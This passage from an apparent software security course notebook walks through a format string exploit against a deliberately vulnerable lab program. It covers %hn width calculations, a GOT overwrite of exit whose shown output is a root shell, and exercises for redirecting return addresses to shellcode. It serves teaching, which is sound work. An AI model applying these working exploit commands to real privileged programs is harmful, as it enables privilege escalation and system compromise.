    - NOTE - the address of text may shift again as we build the final string
    
- subtract 100+8 from the two least significant bytes
    - the 100 bytes of NOP sled and shellcode are printed first (see above)
    - the two 4-byte addresses (8 bytes) used by the `%hn` writes are printed as well


In [194]:
# let's calculate the address of text ...
! printf "%d" $((0xffb8-100-8))

65356

In [195]:
! printf "%d" $((0xffff-0xffb8))

71

- let's check if the address of buffer was calculated correctly by writing to test_val

```bash
┌──(kali㉿kali)-[~/…/SoftwareSecurity/demos/fmt_strings/vuln1]
└─$ ./fmt_vuln.exe $(cat exploit_fmt.bin)$(printf "\x1c\xc0\x04\x08\x1e\xc0\x04\x08")%65356x%29\$hn%71x%30\$hn

....
[*] test_val @ 0x0804c01c = -72 0xffffffb8 <---- address we wanted to write
[*] text is @ 0xffffb5b0 <---- address has changed however....!!!!!
```

### Readjust the width ...
- the text buffer's address has changed...
- recreate the exploit code and launch with the new addresses


In [196]:
print(0xb5b0-100-8)

46404


In [197]:
0xffff-0xb5b0

19023

- let's run the exploit code with the new widths and write the address to test_val

```bash
┌──(kali㉿kali)-[~/…/SoftwareSecurity/demos/fmt_strings/vuln1]
└─$ ./fmt_vuln.exe $(cat exploit_fmt.bin)$(printf "\x1c\xc0\x04\x08\x1e\xc0\x04\x08")%46404x%29\$hn%19023x%30\$hn

...

[*] test_val @ 0x0804c01c = -19024 0xffffb5b0 <---- address we wanted to write
[*] text is @ 0xffffb5b0 <--- address of text is still the same
```
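
Before launching a long format string it is cheap to check on paper what the widths will write. The sketch below models the output count for two `%hn` writes; `value_written` is a hypothetical helper, and it assumes each `%<width>x` prints exactly `width` characters, which holds whenever the width is at least 8.

```python
def value_written(prefix_len, widths):
    """Return the 32-bit value left in memory by two %hn writes (low half first)."""
    count = prefix_len
    halves = []
    for width in widths:
        count += width
        halves.append(count & 0xFFFF)   # %hn stores only the low 16 bits of the count
    low, high = halves
    return (high << 16) | low

# 100 bytes of sled + shellcode and 8 bytes of addresses are printed first
print(hex(value_written(108, (46404, 19023))))  # 0xffffb5b0
print(hex(value_written(108, (65356, 71))))     # 0xffffffb8
```

The first line corresponds to the readjusted widths and the second to the first trial.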

In [198]:
# find the address of exit in GOT to write to
! objdump -R ./fmt_vuln.exe | grep exit

0804c010 R_386_JUMP_SLOT   exit@GLIBC_2.0


- modify the string to write to the address of exit function
- run the final exploit code on Terminal

```bash
┌──(kali㉿kali)-[~/…/SoftwareSecurity/demos/fmt_strings/vuln1]
└─$ ./fmt_vuln.exe $(cat exploit_fmt.bin)$(printf "\x10\xc0\x04\x08\x12\xc0\x04\x08")%46404x%29\$hn%19023x%30\$hn

...

[*] test_val @ 0x0804c01c = -72 0xffffffb8
[*] text is @ 0xffffb5b0
# whoami                                                                                                       
root
# ls                                                                                                           
Makefile        exploit_fmt.bin  fmt_vuln.exe  getenvaddr.cpp  shellcode_root.bin
directpara.exe  fmt_vuln.cpp     fmt_vuln.o    getenvaddr.exe
#    
```

## Exercise 1
- stash your shellcode in shell environment and exploit the `format string` vulnerability in `labs/format_string/fmt_string.cpp` to execute the shellcode by modifying the return address to the address of shellcode in environment variable.

### steps:
- stash your shellcode in shell environment
- find the address of shellcode using getenvaddr program
- find the nth parameter that'll crash program

```bash
$ python -c 'print("AAAA%x%x%x%x%x%x%x")' | ./fmt_vuln2.exe 
$ python -c 'print("AAAA%x%x%x%x%x%x%7\$x")' | ./fmt_vuln2.exe
$ python -c 'print("<return address>%7\$n")' | ./fmt_vuln2.exe
$ python -c 'print("<8-byte return address>%widthx%7\$hn%widthx%8\$hn")' | ./fmt_vuln2.exe
```
- after doing some math, overwrite the return address with the shellcode address using two half (`%hn`) writes

## Exercise 2
- Smuggle your `shellcode` as a part of data into the program and exploit the `format string` vulnerability in `labs/format_string/fmt_string.cpp` program found in this repo by modifying the return address to point to the exploit code.

### steps
- compile and make `labs/format_string/fmt_string.cpp` program a privileged program
- run the program to note the return address and the address of input buffer
- create an exploit file with 12 (nop sled) + 24 (shellcode) = 36 bytes; it is easier if the total number of bytes is a multiple of 4
```bash
$ python -c 'import sys; sys.stdout.buffer.write(b"\x90"*12)' > fmt_vuln2exploit.bin
$ cat shellcode.bin >> fmt_vuln2exploit.bin
$ wc -c fmt_vuln2exploit.bin
```
- find out the right parameter number that starts repeating AAAA in hex
```bash
$ ./fmt_vuln2.exe $(cat fmt_vuln2exploit.bin)$(printf "AAAA")%1\$x
$ ./fmt_vuln2.exe $(cat fmt_vuln2exploit.bin)$(printf "AAAA")%2\$x
# ... keep incrementing the parameter number until 41414141 appears ...
$ ./fmt_vuln2.exe $(cat fmt_vuln2exploit.bin)$(printf "AAAA")%15\$x
```

- now find the width parameter to write the address of input buffer at the return address: let's say:
    - input is @ 0xffffc2e8
    - return address @ 0xffffc3bc
 
- find the widths for the two least significant bytes and then for the two most significant bytes

```bash
$ printf "%d" $((0xc2e8-36-8)) # 36 bytes is exploit code; that is printed as well. => 49852
$ printf "%d" $((0xffff-0xc2e8)) # -> 15639
```
- final exploit will look something like this...

```bash
$ ./fmt_vuln2.exe $(cat fmt_vuln2exploit.bin)$(printf "\xbc\xc3\xff\xff\xbe\xc3\xff\xff")%49852x%15\$hn%15639x%16\$hn
```